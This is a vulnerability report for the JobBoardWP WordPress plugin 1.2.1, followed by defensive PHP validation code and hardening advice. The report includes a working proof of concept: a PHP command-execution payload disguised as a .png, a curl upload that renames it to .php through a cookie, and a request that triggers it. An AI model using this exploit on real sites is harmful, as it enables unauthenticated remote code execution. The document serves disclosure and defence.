The plugin does not properly validate file names and types in its file upload functionality, allowing unauthenticated users to upload arbitrary files such as PHP scripts.
Setup:
1. Install the vulnerable plugin (jobboardwp version 1.2.1)
2. In the toast message that appears on the plugin's installation page, create the required pages for the plugin to work properly
Attack:
1. As an unauthenticated user, extract the nonce from the "Jobs" page (by default /?page_id=5), CTRL+F for "jb_front_data"
2. Prepare a payload you want to upload, ensure that the filename ends with ".png":
echo '<?php passthru("id"); ?>' > /tmp/payload.png
3. Invoke the following curl command, with the nonce embedded, to upload the payload:
curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=jb-upload-company-logo' \
  -H 'Cookie: jb-logo-upload=payload.php' \
  -F 'nonce=<NONCE>' \
  -F 'chunks=1' \
  -F 'file=@/tmp/payload.png'
4. Trigger the payload by accessing it (the location of the payload is returned by the curl command above):
curl 'http://127.0.0.1:7777/wp-content/uploads/jobboardwp/temp/payload.php'
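The root cause is that the stored filename is taken from the client (the jb-logo-upload cookie) while only the uploaded file's extension is checked. As an added example, not code from this report or from the JobBoardWP plugin, here is a plain-PHP validation routine of the kind such a handler should apply; the function and constant names are assumptions.

```php
<?php
// Added example, not the plugin's code: server-side validation for an image
// upload such as a company-logo handler. The name stored on disk is built from
// an allowlisted extension plus random bytes; nothing client-controlled
// (cookie, form field, original filename) decides the extension on disk.

const LOGO_ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];

/**
 * Validate one $_FILES entry and return the safe destination basename, or throw.
 * $file = ['name' => ..., 'tmp_name' => ..., 'error' => ..., 'size' => ...]
 */
function validate_logo_upload(array $file, int $max_bytes = 2 * 1024 * 1024): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (($file['size'] ?? 0) > $max_bytes) {
        throw new RuntimeException('file too large');
    }
    // The client-supplied extension is only a claim; it must be on the allowlist.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(LOGO_ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Content sniffing: the bytes must actually be the claimed image type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if ($mime !== LOGO_ALLOWED[$ext]) {
        throw new RuntimeException("content is $mime, not " . LOGO_ALLOWED[$ext]);
    }
    // It must also decode as an image (a script renamed to .png fails here).
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }
    // Server-chosen name: random, with the validated extension, never from a cookie.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed demo: a file named .png whose content is PHP text is rejected.
$tmp = tempnam(sys_get_temp_dir(), 'logo');
file_put_contents($tmp, '<?php echo "not an image"; ?>');
try {
    validate_logo_upload(['name' => 'logo.png', 'tmp_name' => $tmp, 'error' => UPLOAD_ERR_OK, 'size' => 30]);
} catch (RuntimeException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
unlink($tmp);
```

Inside WordPress the same checks map to wp_check_filetype_and_ext() and wp_verify_nonce(); note that a nonce readable by any visitor in jb_front_data is not an authorization control, so the handler also needs a capability check. Serving the uploads directory with PHP execution disabled is a second, independent layer.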